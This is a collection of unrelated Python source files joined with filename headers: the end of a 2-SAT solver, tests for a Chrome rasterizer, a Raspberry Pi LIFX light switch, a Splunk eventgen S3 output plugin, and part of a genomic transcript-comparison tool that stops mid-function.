reversed_adjs = [[] for _ in range(2*n)]
for clause in clauses:
#if len(clause) == 1:
# assert False, 'should be two terms in the clause'
left = clause[0]
right = clause[1]
for term in [left, right]:
if not term in node_dict:
var_dict[node_num] = term
node_dict[term] = node_num
node_num += 1
if not -term in node_dict:
var_dict[node_num] = -term
node_dict[-term] = node_num
node_num += 1
adjacents[node_dict[-left]].append(node_dict[right])
reversed_adjs[node_dict[right]].append(node_dict[-left])
adjacents[node_dict[-right]].append(node_dict[left])
reversed_adjs[node_dict[left]].append(node_dict[-right])
return edges, adjacents[:node_num], reversed_adjs[:node_num], node_dict, var_dict
def is_satisfiable(n, m, clauses):
edges, implication_g, reversed_imp_g, node_map, var_map = build_implication_graph(n, clauses)
ccs = analyse_connected_components_(n, implication_g, reversed_imp_g, var_map)
#print(ccs)
result = collections.defaultdict(lambda: None)
for cc in ccs:
cc_vars = set([])
for node in cc:
lit = var_map[node]
if abs(lit) in cc_vars:
return None
else:
cc_vars.add(abs(lit))
if result[abs(lit)] is None:
if lit < 0:
result[abs(lit)] = 0
else:
result[abs(lit)] = 1
return result
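# Hedged sanity-check sketch (comment only, so it does not interfere with the
# stdin-driven entry point below):
#   is_satisfiable(1, 2, [[1, 1], [-1, -1]]) should return None, because the clauses
#   force both x1 and NOT x1, which places a literal and its negation in the same
#   strongly connected component of the implication graph.
#   is_satisfiable(2, 2, [[1, 2], [-1, 2]]) should return a dict assignment, since the
#   formula is satisfiable (x2 = True works regardless of x1).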
def circuit_design():
n, m = map(int, input().split())
clauses = [ list(map(int, input().split())) for i in range(m) ]
result = is_satisfiable(n, m, clauses)
if result is None:
print("UNSATISFIABLE")
else:
print("SATISFIABLE")
print(" ".join(str(i if result[i] else -i) for i in range(1, n+1)))
if __name__ == '__main__':
threading.Thread(target=circuit_design).start()
|
rasterize_test.py
|
from rasterize import rasterize, find_zombie_processes, merge_options, DEFAULT_CHROME_OPTIONS, rasterize_image_command
import demistomock as demisto
from CommonServerPython import entryTypes
from tempfile import NamedTemporaryFile
import subprocess
import os
import logging
import http.server
import time
import threading
import pytest
# disable warning from urllib3. these are emitted when python driver can't connect to chrome yet
logging.getLogger("urllib3").setLevel(logging.ERROR)
RETURN_ERROR_TARGET = 'rasterize.return_error'
def test_rasterize_email_image(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='png')
caplog.clear()
def test_rasterize_email_pdf(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=False)
caplog.clear()
def test_rasterize_email_pdf_offline(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=True)
caplog.clear()
def test_rasterize_no_defunct_processes(caplog):
with NamedTemporaryFile('w+') as f:
f.write('<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">'
'</head><body><br>---------- TEST FILE ----------<br></body></html>')
path = os.path.realpath(f.name)
f.flush()
rasterize(path=f'file://{path}', width=250, height=250, r_type='pdf', offline_mode=False)
process = subprocess.Popen(['ps', '-aux'], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
processes_str, _ = process.communicate()
processes = processes_str.split('\n')
defunct_process_list = [process for process in processes if 'defunct' in process]
assert not defunct_process_list
zombies, output = find_zombie_processes()
assert not zombies
assert 'defunct' not in output
caplog.clear()
def test_find_zombie_processes(mocker):
ps_output = ''' PID PPID S CMD
1 0 S python /tmp/pyrunner/_script_docker_python_loop.py
39 1 Z [soffice.bin] <defunct>
55 1 Z [gpgconf] <defunct>
57 1 Z [gpgconf] <defunct>
59 1 Z [gpg] <defunct>
61 1 Z [gpgsm] <defunct>
63 1 Z [gpgconf] <defunct>
98 1 Z [gpgconf] <defunct>
100 1 Z [gpgconf] <defunct>
102 1 Z [gpg] <defunct>
'''
mocker.patch.object(subprocess, 'check_output', return_value=ps_output)
mocker.patch.object(os, 'getpid', return_value=1)
zombies, output = find_zombie_processes()
assert len(zombies) == 9
assert output == ps_output
def test_merge_options():
res = merge_options(DEFAULT_CHROME_OPTIONS, '')
assert res == DEFAULT_CHROME_OPTIONS
res = merge_options(DEFAULT_CHROME_OPTIONS, '[--disable-dev-shm-usage],--disable-auto-reload, --headless')
assert '--disable-dev-shm-usage' not in res
assert '--no-sandbox' in res # part of default options
assert '--disable-auto-reload' in res
assert len([x for x in res if x == '--headless']) == 1 # should have only one headless option
res = merge_options(DEFAULT_CHROME_OPTIONS, r'--user-agent=test\,comma')
assert len([x for x in res if x.startswith('--user-agent')]) == 1
assert '--user-agent=test,comma' in res
res = merge_options(DEFAULT_CHROME_OPTIONS, r'[--user-agent]') # remove user agent
assert len([x for x in res if x.startswith('--user-agent')]) == 0
def test_rasterize_large_html():
path = os.path.realpath('test_data/large.html')
res = rasterize(path=f'file://{path}', width=250, height=250, r_type='png')
assert res
@pytest.fixture
def http_wait_server():
# Simple http handler which waits 10 seconds before responding
    class WaitHandler(http.server.BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
time.sleep(10)
try:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("<html><head><title>Test wait handler</title></head>"
"<body><p>Test Wait</p></body></html>", 'utf-8'))
self.flush_headers()
except BrokenPipeError: # ignore broken pipe as socket might have been closed
pass
# disable logging
def log_message(self, format, *args):
pass
    with http.server.ThreadingHTTPServer(('', 10888), WaitHandler) as server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield
server.shutdown()
server_thread.join()
# Some web servers can block the connection after the http is sent
# In this case chromium will hang. An example for this is:
# curl -v -H 'user-agent: HeadlessChrome' --max-time 10 "http://www.grainger.com/" # disable-secrets-detection
# This tests access a server which waits for 10 seconds and makes sure we timeout
def test_rasterize_url_long_load(mocker, http_wait_server):
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
    time.sleep(1)  # give the server time to start
rasterize('http://localhost:10888', width=250, height=250, r_type='png', max_page_load_time=5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert 'Timeout exception' in err_msg
return_error_mock.reset_mock()
# test that with a higher value we get a response
assert rasterize('http://localhost:10888', width=250, height=250, r_type='png', max_page_load_time=0)
assert not return_error_mock.called
def test_rasterize_image_to_pdf(mocker):
path = os.path.realpath('test_data/image.png')
mocker.patch.object(demisto, 'args', return_value={'EntryID': 'test'})
mocker.patch.object(demisto, 'getFilePath', return_value={"path": path})
mocker.patch.object(demisto, 'results')
rasterize_image_command()
assert demisto.results.call_count == 1
# call_args is tuple (args list, kwargs). we only need the first one
results = demisto.results.call_args[0]
assert len(results) == 1
assert results[0]['Type'] == entryTypes['entryInfoFile']
|
lifx.py
|
"""
Provides physical switching of Lifx devices from a Raspberry Pi
"""
import argparse
import random
from threading import Thread, Timer
from time import time
from time import sleep
import lifxlan
import yaml
from gpiozero import Button as LifxButton
class Discovery(Thread):
"""An endless thread that discovers Lifx devices"""
def __init__(self, name, groups):
Thread.__init__(self)
self.name = name
self.lifx = lifxlan.LifxLAN()
self.groups = groups
def run(self):
print("DEBUG: starting discovery thread")
sleep_time = 5
devices_max = 0
while True: # pylint: disable=too-many-nested-blocks
try:
devices = self.lifx.get_devices()
print(f"DEBUG: found {len(devices)} Lifx devices")
for device in devices:
grp = device.get_group()
if grp:
grp = grp.lower()
if grp in self.groups:
found = False
for light in self.groups[grp].devices:
if device.get_mac_addr() == light.get_mac_addr():
found = True
if not found:
self.groups[grp].add_device(device)
print(f"INFO: {device.get_label()} added to group {grp}")
if len(devices) > devices_max:
devices_max = len(devices)
elif devices and len(devices) == devices_max:
# increase sleep until max sleep of 15 minutes
if sleep_time < (15 * 60):
sleep_time = sleep_time + 5
except lifxlan.errors.WorkflowException:
print("WARN: WorkflowException on discovery")
sleep(sleep_time)
class LifxSwitch():
"""Provides the main logic of switching Lifx devices from a Raspberry Pi"""
def __init__(self, args=None):
self.args = args
if not self.args:
self.parse_args()
if not self.args:
raise RuntimeError('Args not provided')
LifxButton.last_release = 0
LifxButton.was_held = False
LifxButton.single_click = None
LifxButton.double_click = None
LifxButton.long_click = None
LifxButton.scenes = None
LifxButton.sc_timer = None
LifxButton.lifx_group = None
self.buttons = {}
self.groups = {}
self.hold_time = 0.400
self.sc_threshold = 0.400
self.transition_time = 0.400 * 1000
self.parse_config(self.args.config_file)
self.discovery_thread = Discovery('lifx_discovery', self.groups)
self.discovery_thread.start()
def parse_args(self):
"""Parse the arguments to the program"""
parser = argparse.ArgumentParser()
parser.add_argument('--config-file', '-c', required=True)
self.args = parser.parse_args()
def parse_config(self, config_file):
"""
Parse the configuration file
XXX: This could be much better
"""
config = None
with open(config_file, 'rb') as fh: # pylint: disable=invalid-name
config = yaml.safe_load(fh)
if 'timing' in config:
if 'double_click' in config['timing']:
self.sc_threshold = config['timing']['double_click'] / 1000
if 'hold_time' in config['timing']:
self.hold_time = config['timing']['hold_time'] / 1000
for button_number, b_conf in config['buttons'].items():
button = LifxButton(button_number, hold_time=self.hold_time)
button.when_held = self.held
button.when_released = self.released
button.single_click = b_conf.get('single', None)
button.double_click = b_conf.get('double', None)
button.long_click = b_conf.get('long', None)
button.scenes = b_conf['scenes']
button.sc_timer = self.get_sc_timer(button)
self.buttons[button_number] = button
group_name = b_conf['group'].lower()
group = self.groups.get(group_name, None)
if not group:
group = lifxlan.Group()
self.groups[group_name] = group
button.lifx_group = {
'name': group_name,
'group': group,
}
def toggle_power(self, button, group):
"""Toggle the power status of the given group of devices"""
power = None
for device in group.devices:
try:
power = device.get_power()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_power for button {button.pin.number}")
if power is not None:
break
if power is None:
print(f"WARN: no devices replied to get_power for button {button.pin.number}")
return
group.set_power(not power, self.transition_time, True)
print(f"DEBUG: toggled power {not power}")
def reset_or_boost(self, button, group):
"""Reset the devices to the default scene, or to the "boost" scene if already on the default"""
color = None
for device in group.devices:
try:
color = device.get_color()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_color for button {button.pin.number}")
if color is not None:
break
if color is None:
print(f"WARN: no devices replied to get_color for button {button.pin.number}")
return
if (color[2] == button.scenes['default'][2]) and (color[3] == button.scenes['default'][3]):
group.set_color(button.scenes['boost'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was default, now boosted")
else:
# is something non-default, now back to default
group.set_color(button.scenes['default'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} restored to default")
group.set_power('on', self.transition_time, True)
def dim_cycle_plus_colourful(self, button, group):
"""
Progressively dim the devices in the group, or set them to random colours if fully dimmed
Resets to the default scene if none of the dim scenes are detected
"""
color = None
for device in group.devices:
try:
color = device.get_color()
except lifxlan.errors.WorkflowException:
print(f"INFO: WorkflowException on get_color for button {button.pin.number}")
if color is not None:
break
if color is None:
print(f"WARN: no devices replied to get_color for button {button.pin.number}")
return
if (color[2] == button.scenes['default'][2]) and (color[3] == button.scenes['default'][3]):
group.set_color(button.scenes['dim'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was default, now dim")
elif (color[2] == button.scenes['dim'][2]) and (color[3] == button.scenes['dim'][3]):
group.set_color(button.scenes['dimmer'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was dim, now dimmer")
elif (color[2] == button.scenes['dimmer'][2]) and (color[3] == button.scenes['dimmer'][3]):
group.set_color(button.scenes['dimmest'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} was dimmer, now dimmest")
elif (color[2] == button.scenes['dimmest'][2]) and (color[3] == button.scenes['dimmest'][3]):
# multi-threaded color change
threads = []
for device in group.devices:
color = [random.randint(0, 65535), 49151, 49151, 3500]
thread = Thread(target=device.set_color, args=[color, self.transition_time, True])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
print(f"DEBUG: {button.pin.number} was dimmest, now colourful")
else:
group.set_color(button.scenes['default'], self.transition_time, True)
print(f"DEBUG: {button.pin.number} is now back to default")
group.set_power('on', self.transition_time, True)
def get_sc_timer(self, button):
"""Returns a timer to use with single/double click detection"""
return Timer(self.sc_threshold, self.single_click, args=[button])
def single_click(self, button):
"""Executes the single click function of the button"""
print(f"INFO: single click detected on button {button.pin.number}")
# provide timer for next single click
button.sc_timer = self.get_sc_timer(button)
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.single_click)(button, group)
@staticmethod
def sc_detection(button):
"""Starts the timer to see if this is a single click"""
if not button.sc_timer.is_alive():
print("DEBUG: starting single/double click timer")
button.sc_timer.start()
def double_click(self, button):
"""Executes the double click function of the button"""
print(f"INFO: double click detected on button {button.pin.number}")
button.sc_timer.cancel()
# provide timer for next single click
button.sc_timer = self.get_sc_timer(button)
if button.double_click:
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.double_click)(button, group)
def long_press(self, button):
"""Executes the long press function of the button"""
group = button.lifx_group['group']
if group and group.devices:
getattr(self, button.long_click)(button, group)
def click(self, button):
"""Receives a click event (from button released event)"""
if (time() - button.last_release) < self.sc_threshold:
self.double_click(button)
else:
self.sc_detection(button)
def held(self, button):
"""Receives a button held event"""
print(f"DEBUG: {button.pin.number} is being held")
button.was_held = True
self.long_press(button)
def released(self, button):
"""Receives a button released event"""
if button.was_held:
print(f"DEBUG: {button.pin.number} has been released")
else:
print(f"DEBUG: {button.pin.number} has been clicked")
self.click(button)
button.was_held = False
button.last_release = time()
if __name__ == '__main__':
switch = LifxSwitch()
# Note: if the discovery thread exits, the program will exit
|
awss3.py
|
import datetime
import threading
import uuid
import requests
from splunk_eventgen.lib.logging_config import logger
from splunk_eventgen.lib.outputplugin import OutputPlugin
try:
import boto3
import botocore.exceptions
boto_imported = True
except ImportError:
boto_imported = False
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
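# Hypothetical usage of the decorator above (not part of the original module):
#
#   @threaded
#   def upload(payload):
#       ...           # runs in a background thread
#
#   t = upload(data)  # returns the started Thread; call t.join() to wait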
class AwsS3OutputPlugin(OutputPlugin):
"""
AwsS3 output will enable events that are generated to be sent directly
    to AWS S3 through the boto3 API. In order to use this plugin,
    you will need to supply the AWS settings in the config file.
    """
name = "awsS3"
useOutputQueue = False
# MAXQUEUELENGTH = 100
validSettings = [
"awsS3BucketName",
"awsS3CompressionType",
"awsS3EventType",
"awsS3ObjectPrefix",
"awsS3ObjectSuffix",
"awsRegion",
"awsKeyId",
"awsSecretKey",
"awsS3EventPerKey",
]
defaultableSettings = [
"awsKeyId",
"awsSecretKey",
"awsS3EventType",
"awsS3CompressionType",
"awsS3ObjectPrefix",
"awsS3ObjectSuffix",
]
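    # Illustrative eventgen.conf stanza for this plugin. Only the aws*/awsS3*
    # setting names below come from validSettings above; the stanza name,
    # outputMode key and all values are assumed placeholders:
    #
    #   [my_sample]
    #   outputMode = awsS3
    #   awsS3BucketName = my-bucket
    #   awsRegion = us-east-1
    #   awsKeyId = YOUR_ACCESS_KEY
    #   awsSecretKey = YOUR_SECRET_KEY
    #   awsS3EventType = syslog
    #   awsS3CompressionType = gz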
def __init__(self, sample, output_counter=None):
# Override maxQueueLength to EventPerKey so that each flush
# will generate one aws key
if sample.awsS3EventPerKey:
sample.maxQueueLength = sample.awsS3EventPerKey
OutputPlugin.__init__(self, sample, output_counter)
if not boto_imported:
logger.error("There is no boto3 or botocore library available")
return
# disable any "requests" warnings
requests.packages.urllib3.disable_warnings()
# Bind passed in samples to the outputter.
self.awsS3compressiontype = (
sample.awsS3CompressionType
if hasattr(sample, "awsS3CompressionType") and sample.awsS3CompressionType
else None
)
self.awsS3eventtype = (
sample.awsS3EventType
if hasattr(sample, "awsS3EventType") and sample.awsS3EventType
else "syslog"
)
self.awsS3objectprefix = (
sample.awsS3ObjectPrefix
if hasattr(sample, "awsS3ObjectPrefix") and sample.awsS3ObjectPrefix
else ""
)
self.awsS3objectsuffix = (
sample.awsS3ObjectSuffix
if hasattr(sample, "awsS3ObjectSuffix") and sample.awsS3ObjectSuffix
else ""
)
self.awsS3bucketname = sample.awsS3BucketName
logger.debug(
"Setting up the connection pool for %s in %s"
% (self._sample.name, self._app)
)
self._client = None
self._createConnections(sample)
logger.debug("Finished init of awsS3 plugin.")
def _createConnections(self, sample):
try:
if hasattr(sample, "awsKeyId") and hasattr(sample, "awsSecretKey"):
self._client = boto3.client(
"s3",
region_name=sample.awsRegion,
aws_access_key_id=sample.awsKeyId,
aws_secret_access_key=sample.awsSecretKey,
)
if self._client is None:
msg = """
[your_eventgen_stanza]
awsKeyId = YOUR_ACCESS_KEY
awsSecretKey = YOUR_SECRET_KEY
"""
                    logger.error(
                        "Failed to init boto3 client; you should define correct "
                        "'awsKeyId' and 'awsSecretKey' in the eventgen conf, e.g.:%s"
                        % msg
                    )
raise Exception(msg)
else:
self._client = boto3.client("s3", region_name=sample.awsRegion)
except Exception as e:
logger.error("Failed for init boto3 client: exception = %s" % e)
raise e
# Try list bucket method to validate if the connection works
try:
self._client.list_buckets()
except botocore.exceptions.NoCredentialsError:
msg = """
[default]
aws_access_key_id = YOUR_ACCESS_KEY
aws_secret_access_key = YOUR_SECRET_KEY
"""
            logger.error(
                "Failed to init boto3 client; you should create "
                "'~/.aws/credentials' with credential info, e.g.:%s" % msg
            )
raise
logger.debug("Init conn done, conn = %s" % self._client)
def _sendPayloads(self, payload):
numberevents = len(payload)
logger.debug("Sending %s events to s3 key" % numberevents)
self._transmitEvents(payload)
def _transmitEvents(self, payloadstring):
logger.debug(
"Transmission called with payloadstring event number: %d "
% len(payloadstring)
)
records = "".join(payloadstring)
# Different key prefix for different log type
if self.awsS3eventtype == "elbaccesslog":
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().strftime("%Y%m%dT%H%MZ")
+ "_"
+ str(uuid.uuid1())
+ self.awsS3objectsuffix
)
elif self.awsS3eventtype == "s3accesslog":
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().strftime("%Y-%m-%d-%H-%M-%S")
+ "-"
+ str(uuid.uuid1()).replace("-", "").upper()[0:15]
+ self.awsS3objectsuffix
)
else:
s3keyname = (
self.awsS3objectprefix
+ datetime.datetime.utcnow().isoformat()
+ str(uuid.uuid1())
+ self.awsS3objectsuffix
)
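        # Illustrative key names with empty prefix/suffix: the elbaccesslog
        # branch yields e.g. "20170102T0304Z_<uuid1>", the s3accesslog branch
        # "2017-01-02-03-04-05-<15 hex chars>", and the fallback branch
        # "<ISO timestamp><uuid1>".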
logger.debug("Uploading %d events into s3 key: %s " % (len(records), s3keyname))
        if self.awsS3compressiontype == "gz":
            import gzip
            import io
            # gzip produces bytes, so compress through a BytesIO buffer
            out = io.BytesIO()
            with gzip.GzipFile(fileobj=out, mode="wb") as f:
                f.write(records.encode("utf-8"))
            records = out.getvalue()
try:
response = self._client.put_object(
Bucket=self.awsS3bucketname, Key=s3keyname, Body=records
)
logger.debug("response = %s" % response)
except Exception as e:
logger.error("Failed for exception: %s" % e)
logger.debug("Failed sending events to payload: %s" % (payloadstring))
raise e
def flush(self, q):
logger.debug("Flush called on awsS3 plugin with length %d" % len(q))
if len(q) > 0:
try:
payload = []
logger.debug("Currently being called with %d events" % len(q))
for event in q:
if event.get("_raw") is None:
logger.error("failure outputting event, does not contain _raw")
else:
payload.append(event["_raw"])
logger.debug("Finished processing events, sending all to AWS S3")
self._sendPayloads(payload)
except Exception as e:
import traceback
                logger.error(traceback.format_exc())
logger.error("failed sending events, reason: %s " % e)
def load():
"""Returns an instance of the plugin"""
return AwsS3OutputPlugin
|
taco_refcomp.py
|
import argparse
import logging
import os
import sys
import operator
import collections
import shutil
import subprocess
import multiprocessing
import taco
import share
import pkgutil
import string
import glob
from taco.lib.bx.intersection import Interval, IntervalTree #1
from taco.lib.bx.cluster import ClusterTree #lx1
from taco.lib.base import Category, GTFAttr #3
from taco.lib.gtf_comp import sort_gtf, GTFFeature #4
from taco.lib.transcript import cmp_strand, parse_gtf, \
strand_int_to_str, NO_STRAND, POS_STRAND, NEG_STRAND, \
find_exon_boundaries, split_exons
# for nearest transcripts calculation
MAX_LOCUS_DIST = 100000000
GENCODE_CATEGORY_MAP = {'IG_C_gene': 'protein_coding',
'IG_D_gene': 'protein_coding',
'IG_J_gene': 'protein_coding',
'IG_V_gene': 'protein_coding',
'IG_LV_gene': 'protein_coding',
'TR_C_gene': 'protein_coding',
'TR_J_gene': 'protein_coding',
'TR_V_gene': 'protein_coding',
'TR_D_gene': 'protein_coding',
'TEC': 'protein_coding',
'nonsense_mediated_decay': 'protein_coding',
'non_stop_decay': 'protein_coding',
'retained_intron': 'protein_coding',
'protein_coding': 'protein_coding',
'ambiguous_orf': 'protein_coding',
'processed_transcript': 'protein_coding',
'Mt_rRNA': 'ncRNA',
'Mt_tRNA': 'ncRNA',
'miRNA': 'ncRNA',
'misc_RNA': 'ncRNA',
'rRNA': 'ncRNA',
'snRNA': 'ncRNA',
'snoRNA': 'ncRNA',
'3prime_overlapping_ncrna': 'ncRNA',
'lincRNA': 'lncRNA',
'sense_intronic': 'lncRNA',
'sense_overlapping': 'lncRNA',
'antisense': 'lncRNA',
'bidirectional_promoter_lncrna' : 'lncRNA',
'ribozyme' : 'lncRNA',
'macro_lncRNA': 'lncRNA',
'non_coding': 'lncRNA',
'bidirectional_promoter_lncRNA': 'lncRNA',
'scaRNA': 'ncRNA',
'sRNA': 'ncRNA',
'IG_pseudogene': 'pseudogene',
'IG_C_pseudogene': 'pseudogene',
'IG_J_pseudogene': 'pseudogene',
'IG_V_pseudogene': 'pseudogene',
'TR_V_pseudogene': 'pseudogene',
'TR_J_pseudogene': 'pseudogene',
'Mt_tRNA_pseudogene': 'pseudogene',
'tRNA_pseudogene': 'pseudogene',
'snoRNA_pseudogene': 'pseudogene',
'snRNA_pseudogene': 'pseudogene',
'scRNA_pseudogene': 'pseudogene',
'rRNA_pseudogene': 'pseudogene',
'misc_RNA_pseudogene': 'pseudogene',
'miRNA_pseudogene': 'pseudogene',
'pseudogene': 'pseudogene',
'processed_pseudogene': 'pseudogene',
'polymorphic_pseudogene': 'pseudogene',
'retrotransposed': 'pseudogene',
'transcribed_processed_pseudogene': 'pseudogene',
'transcribed_unprocessed_pseudogene': 'pseudogene',
'unitary_pseudogene': 'pseudogene',
'transcribed_unitary_pseudogene': 'pseudogene',
'translated_unprocessed_pseudogene': 'pseudogene',
'unprocessed_pseudogene': 'pseudogene'}
def gencode_category_map(x):
    # note: 'ncrna' is a suffix of 'lncrna', so the more specific 'lncrna'
    # check must come first or the lncRNA branch can never be reached
    if 'lncrna' in x.lower():
        out = 'lncRNA'
    elif 'ncrna' in x.lower():
        out = 'ncRNA'
    else:
        out = GENCODE_CATEGORY_MAP.get(x, 'other')
    return out
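# Examples of the mapping above (illustrative, derived from the table and
# substring checks): 'protein_coding' -> 'protein_coding' (table lookup),
# 'bidirectional_promoter_lncrna' -> 'lncRNA', '3prime_overlapping_ncrna'
# -> 'ncRNA', and any biotype not covered falls back to 'other'.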
# attributes to include in TSV that is generated at the end
FULL_GTF_ATTRS = ['gene_id',
'tss_id',
'annotation',
'category',
'category_relative',
'category_relative_detail',
'cpat_coding_prob',
'orf_size',
'ref_transcript_id',
'ref_gene_id',
'ref_gene_name',
'ref_gene_type',
'ref_length',
'shared_same_strand_bp',
'shared_opp_strand_bp',
'shared_introns',
'shared_splicing']
def wc(infile):
p = subprocess.Popen('wc -l %s' % infile, shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
return int(out.split()[0])
# class + function to get metadata TSV from gtf
class TranscriptMetadata(object):
def __init__(self, gtf_attrs=None):
self.chrom = None
self.start = 0
self.end = 0
self.strand = '.'
self.num_exons = 0
self.length = 0
if gtf_attrs is not None:
for attr in gtf_attrs:
setattr(self, attr, '')
def get_gtf_metadata(gtf_file, gtf_attrs):
if gtf_attrs is None:
gtf_attrs = []
if 'transcript_id' in gtf_attrs:
gtf_attrs.remove('transcript_id')
# read gtf file
metadata_dict = {}
for feature in GTFFeature.parse(open(gtf_file)):
if feature.feature_type != "exon":
continue
t_id = feature.attrs["transcript_id"]
if t_id not in metadata_dict:
# instantiate new metadata
m = TranscriptMetadata()
m.chrom = feature.seqid
m.strand = feature.strand
m.start = feature.start
m.end = feature.end
for gtf_attr in gtf_attrs:
setattr(m, gtf_attr, feature.attrs.get(gtf_attr, 'NA'))
metadata_dict[t_id] = m
else:
m = metadata_dict[t_id]
# update metadata
m.start = feature.start if feature.start < m.start else m.start
m.end = feature.end if feature.end > m.end else m.end
m.length += (feature.end - feature.start)
m.num_exons += 1
return metadata_dict
# function to get bed from GTF for CPAT
def write_bed(chrom, name, strand, score, exons):
assert all(exons[0].start < x.start for x in exons[1:])
assert all(exons[-1].end > x.end for x in exons[:-1])
tx_start = exons[0].start
tx_end = exons[-1].end
block_sizes = []
block_starts = []
for e in exons:
block_starts.append(e.start - tx_start)
block_sizes.append(e.end - e.start)
# make bed fields
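    # The twelve fields below follow the BED12 convention: chrom, chromStart,
    # chromEnd, name, score, strand, thickStart, thickEnd, itemRgb, blockCount,
    # blockSizes, blockStarts. thickStart == thickEnd here, i.e. no coding
    # region is marked on these transcripts.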
fields = [chrom,
str(tx_start),
str(tx_end),
str(name),
str(score),
strand_int_to_str(strand),
str(tx_start),
str(tx_start),
'0',
str(len(exons)),
','.join(map(str,block_sizes)) + ',',
','.join(map(str,block_starts)) + ',']
return fields
class CompareData(object):
__slots__ = ('has_ref', 'has_test', 'category')
def __init__(self):
self.has_ref = False
self.has_test = False
self.category = None
class GlobalStats(object):
FIELDS = ('introns_both', 'introns_ref_only', 'introns_test_only',
'patterns_both', 'patterns_ref_only', 'patterns_test_only',
'cov_both', 'cov_ref_only', 'cov_test_only')
def __init__(self):
for field in GlobalStats.FIELDS:
setattr(self, field, 0)
self.introns_by_category = collections.defaultdict(lambda: 0)
self.patterns_by_category = collections.defaultdict(lambda: 0)
self.cov_by_category = collections.defaultdict(lambda: 0)
def report(self):
# print stats report
introns_total = self.introns_both + self.introns_ref_only + self.introns_test_only
patterns_total = self.patterns_both + self.patterns_ref_only + self.patterns_test_only
cov_total = self.cov_both + self.cov_ref_only + self.cov_test_only
lines = ["introns_total=%d" % (introns_total),
"introns_both=%d" % (self.introns_both),
"introns_ref_only=%d" % (self.introns_ref_only),
"introns_test_only=%d" % (self.introns_test_only),
"introns_precision=%f" % (self.introns_both / float(max(1,self.introns_both + self.introns_test_only))),
"introns_recall=%f" % (self.introns_both / float(max(1,self.introns_both + self.introns_ref_only))),
"patterns_total=%d" % (patterns_total),
"patterns_both=%d" % (self.patterns_both),
"patterns_ref_only=%d" % (self.patterns_ref_only),
"patterns_test_only=%d" % (self.patterns_test_only),
"patterns_precision=%f" % (self.patterns_both / float(max(1,self.patterns_both + self.patterns_test_only))),
"patterns_recall=%f" % (self.patterns_both / float(max(1,self.patterns_both + self.patterns_ref_only))),
"cov_total=%d" % (cov_total),
"cov_both=%d" % (self.cov_both),
"cov_ref_only=%d" % (self.cov_ref_only),
"cov_test_only=%d" % (self.cov_test_only),
"cov_precision=%f" % (self.cov_both / float(max(1,self.cov_both + self.cov_test_only))),
"cov_recall=%f" % (self.cov_both / float(max(1,self.cov_both + self.cov_ref_only)))]
for k in sorted(self.introns_by_category):
lines.append("introns %s=%d" % (k,self.introns_by_category[k]))
for k in sorted(self.patterns_by_category):
lines.append("patterns %s=%d" % (k,self.patterns_by_category[k]))
for k in sorted(self.cov_by_category):
lines.append("cov %s=%d" % (k,self.cov_by_category[k]))
return '\n'.join(lines)
@staticmethod
def from_file(filename):
self = GlobalStats()
with open(filename) as f:
f.next() # introns total
self.introns_both = int(f.next().split('=')[1])
self.introns_ref_only = int(f.next().split('=')[1])
self.introns_test_only = int(f.next().split('=')[1])
f.next() # prec
f.next() # recall
f.next() # patterns total
self.patterns_both = int(f.next().split('=')[1])
self.patterns_ref_only = int(f.next().split('=')[1])
self.patterns_test_only = int(f.next().split('=')[1])
f.next() # prec
f.next() # recall
f.next() # cov total
self.cov_both = int(f.next().split('=')[1])
self.cov_ref_only = int(f.next().split('=')[1])
self.cov_test_only = int(f.next().split('=')[1])
return self
def compute(self, transcripts):
intron_dict = collections.defaultdict(lambda: CompareData())
node_dict = collections.defaultdict(lambda: CompareData())
splicing_pattern_dict = collections.defaultdict(lambda: CompareData())
# find the intron domains of the transcripts
boundaries = find_exon_boundaries(transcripts)
unstranded_transcripts = []
for t in transcripts:
if t.strand == NO_STRAND:
unstranded_transcripts.append(t)
continue
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
# split exons that cross boundaries and get the
# nodes in the transcript path
for n in split_exons(t, boundaries):
n = (t.strand, n[0], n[1])
if is_ref:
node_dict[n].has_ref = True
else:
d = node_dict[n]
d.has_test = True
d.category = t.attrs['category']
splicing_pattern = []
for start,end in t.iterintrons():
n = (t.strand, start, end)
if is_ref:
intron_dict[n].has_ref = True
else:
d = intron_dict[n]
d.has_test = True
d.category = t.attrs['category']
